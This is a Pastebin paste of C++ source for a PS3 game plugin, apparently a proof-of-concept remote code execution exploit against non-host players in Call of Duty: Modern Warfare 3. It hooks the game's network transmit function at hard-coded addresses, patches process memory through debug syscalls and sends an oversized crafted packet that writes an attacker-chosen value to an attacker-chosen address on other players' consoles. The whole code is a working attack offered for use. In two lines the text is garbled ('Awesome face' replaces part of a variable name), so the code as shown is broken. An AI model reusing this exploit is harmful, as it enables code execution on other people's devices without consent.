API tools faq
paste
Advertisement
akaMeltDown

MW3 NON-Host RCE By sab

akaMeltDown
Dec 31st, 2018
637
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 4.68 KB | None | 0 0
raw download clone embed print report
  1. #include <cellstatus.h>
  2.  
  3. #include <sys/prx.h>
  4.  
  5. #include <time.h>
  6.  
  7. #include <fastmath.h>
  8.  
  9. #include <ppu_intrinsics.h>
  10.  
  11. #include <stdarg.h>
  12.  
  13. #include <stddef.h>
  14.  
  15.  
  16.  
  17. #include <sys/prx.h>
  18.  
  19. #include <sys/syscall.h>
  20.  
  21. #include <sys/ppu_thread.h>
  22.  
  23. #include <sys/sys_time.h>
  24.  
  25. #include <sys/time_util.h>
  26.  
  27. #include <sys/timer.h>
  28.  
  29. #include <sys/types.h>
  30.  
  31.  
  32.  
  33. #include <sys/socket.h>
  34.  
  35. #include <netinet\in.h>
  36.  
  37. #include <arpa\inet.h>
  38.  
  39. #include <netdb.h>
  40.  
  41. #include <cell\pad\libpad.h>
  42.  
  43. #include <sys/process.h>
  44.  
  45. #include <sys/memory.h>
  46.  
  47.  
  48.  
  49. SYS_MODULE_INFO( MW3_RCE, 0, 1, 1);
  50.  
  51. SYS_MODULE_START( _MW3_RCE_prx_entry );
  52.  
  53.  
  54.  
  55. /*
  56.  
  57. Credits:
  58.  
  59. Gamer7112 for bring my attention to this
  60.  
  61. momo5502 for originally making a post showing this off.
  62.  
  63. Sabotage finding the exploit and creating the poc
  64.  
  65. */
  66.  
  67.  
  68.  
  69. extern "C" {
  70.  
  71.     void *_sys_memset(void * ptr, void* value, size_t num);
  72.  
  73. }
  74.  
  75.  
  76.  
  77. #define memset          _sys_memset
  78.  
  79.  
  80.  
  81. struct msg_t
  82.  
  83. {
  84.  
  85.     int overflowed;
  86.  
  87.     int readOnly;
  88.  
  89.     char* data;
  90.  
  91.     char* splitData;
  92.  
  93.     int maxsize;
  94.  
  95.     int cursize;
  96.  
  97.     int splitSize;
  98.  
  99.     int readcount;
  100.  
  101.     int bit;
  102.  
  103.     int lastEntityRef;
  104.  
  105.     int targetLocalNetID;
  106.  
  107.     int useZlib;
  108.  
  109. };
  110.  
  111.  
  112.  
  113. #define TOC 0x72DCE8
  114.  
  115.  
  116.  
  117. struct opd_s_o
  118.  
  119. {
  120.  
  121.     unsigned int sub;
  122.  
  123.     unsigned int toc;
  124.  
  125. };
  126.  
  127.  
  128.  
  129. opd_s_o MSG_WriteBitsCompress_t = { 0x001FBFC8, TOC };
  130.  
  131. int(*MSG_WriteBitsCompress)(bool trainHuffman, const char *from, char *to, int size) = (int(*)(bool trainHuffman, const char *from, char *to, int size))&MSG_WriteBitsCompress_t;
  132.  
  133.  
  134.  
  135. opd_s_o MSG_Init_t = { 0x001FBC78, TOC };
  136.  
  137. int(*MSG_Init)(msg_t* msg, char* buffer, int size) = (int(*)(msg_t* msg, char* buffer, int size))&MSG_Init_t;
  138.  
  139.  
  140.  
  141. opd_s_o MSG_WriteData_t = { 0x001FC128, TOC };
  142.  
  143. int(*MSG_WriteData)(msg_t* msg, unsigned char* data, int size) = (int(*)(msg_t* msg, unsigned char* data, int size))&MSG_WriteData_t;
  144.  
  145.  
  146.  
  147. int CL_Netchan_TransmitStub(...)
  148.  
  149. {
  150.  
  151.     __asm("li %r3, 0x332;");
  152.  
  153. }
  154.  
  155.  
  156.  
  157.  
  158.  
  159.  
  160.  
  161. int CL_Netchan_Transmit(int netchan, unsigned char* buffer, int size, int unk)
  162.  
  163. {
  164.  
  165.     if (*(int*)0x10055000 == 2)
  166.  
  167.     {
  168.  
  169.         msg_t message;
  170.  
  171.         memset(&message, 0, sizeof(msg_t));
  172.  
  173.  
  174.  
  175.         char MessageBuffer[0x1000];
  176.  
  177.         char DataToBeSent[0x1000];
  178.  
  179.         memset(MessageBuffer, 0, 0x1000);
  180.  
  181.         memset(DataToBeSent, 0, 0x1000);
  182.  
  183.  
  184.  
  185.         MSG_Init(&message, MessageBuffer, 0x1000);
  186.  
  187.         MSG_WriteData(&message, buffer, 0x9);
  188.  
  189.  
  190.  
  191.         memset(DataToBeSent, 0, 0x840 + 0x9C);
  192.  
  193.  
  194.  
  195.         int* a = (int*)&Awesome faceataToBeSent[0x808];
  196.  
  197.  
  198.  
  199.         a[1] = *(int*)(0x10055014); //value
  200.  
  201.         a[3] = *(int*)(0x10055010); //address
  202.  
  203.  
  204.  
  205.         int* r = (int*)&Awesome faceataToBeSent[0x820];
  206.  
  207.  
  208.  
  209.         r[3] = 0xCAD8C;
  210.  
  211.  
  212.  
  213.         r[35] = 0x1F6E58;
  214.  
  215.         r[36] = 0xAAAAAAAA;
  216.  
  217.  
  218.  
  219.         MSG_WriteData(&message, (unsigned char*)DataToBeSent, 0x840 + 0x9C);
  220.  
  221.  
  222.  
  223.         int CompressedSize = MSG_WriteBitsCompress(0, &message.data[0x9], &message.data[0x9], message.cursize - 0x9);
  224.  
  225.  
  226.  
  227.         *(int*)0x10055000 = 0;
  228.  
  229.  
  230.  
  231.         return CL_Netchan_TransmitStub(netchan, (unsigned char*)message.data, CompressedSize, unk);
  232.  
  233.     }
  234.  
  235.  
  236.  
  237.     return CL_Netchan_TransmitStub(netchan, buffer, size, unk);
  238.  
  239.  
  240.  
  241. }
  242.  
  243.  
  244.  
  245.  
  246.  
  247.  
  248.  
  249. int sys_dbg_read_process_memory(uint64_t address, void* data, size_t size) {
  250.  
  251.     system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
  252.  
  253.     return_to_user_prog(int);
  254.  
  255. }
  256.  
  257.  
  258.  
  259. int sys_dbg_write_process_memory(uint64_t address, void* data, size_t size) {
  260.  
  261.     system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
  262.  
  263.     __dcbst((void*)address);
  264.  
  265.     __sync();
  266.  
  267.     __isync();
  268.  
  269.     return_to_user_prog(int32_t);
  270.  
  271. }
  272.  
  273.  
  274.  
  275. void DetourFunction(int address, void(*hookFunc), void(*stubFunc)) {
  276.  
  277.     int StubData[8], FuncData[4];
  278.  
  279.  
  280.  
  281.     int hook_address = hookFunc != NULL ? *(int*)hookFunc : 0;
  282.  
  283.     int stub_address = stubFunc != NULL ? *(int*)stubFunc : 0;
  284.  
  285.  
  286.  
  287.     if (stub_address) {
  288.  
  289.         int branchAddr = address + 0x10;
  290.  
  291.         StubData[0] = 0x3D600000 + ((branchAddr >> 16) & 0xFFFF) + (branchAddr & 0x8000 ? 1 : 0);
  292.  
  293.         StubData[1] = 0x396B0000 + (branchAddr & 0xFFFF);
  294.  
  295.         StubData[2] = 0x7D6903A6;
  296.  
  297.         StubData[7] = 0x4E800420;
  298.  
  299.         sys_dbg_read_process_memory(address, &StubData[3], 0x10);
  300.  
  301.         sys_dbg_write_process_memory(stub_address, StubData, 0x20);
  302.  
  303.     }
  304.  
  305.  
  306.  
  307.     if (hook_address) {
  308.  
  309.         FuncData[0] = 0x3D600000 + ((hook_address >> 16) & 0xFFFF) + (hook_address & 0x8000 ? 1 : 0);
  310.  
  311.         FuncData[1] = 0x396B0000 + (hook_address & 0xFFFF);
  312.  
  313.         FuncData[2] = 0x7D6903A6;
  314.  
  315.         FuncData[3] = 0x4E800420;
  316.  
  317.         sys_dbg_write_process_memory(address, FuncData, 0x10);
  318.  
  319.     }
  320.  
  321. }
  322.  
  323.  
  324.  
  325.  
  326.  
  327. extern "C" int _MW3_RCE_prx_entry(void)
  328.  
  329. {
  330.  
  331.     DetourFunction(0xDE810, CL_Netchan_TransmitStub, CL_Netchan_Transmit);
  332.  
  333.  
  334.  
  335.     return SYS_PRX_RESIDENT;
  336.  
  337. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!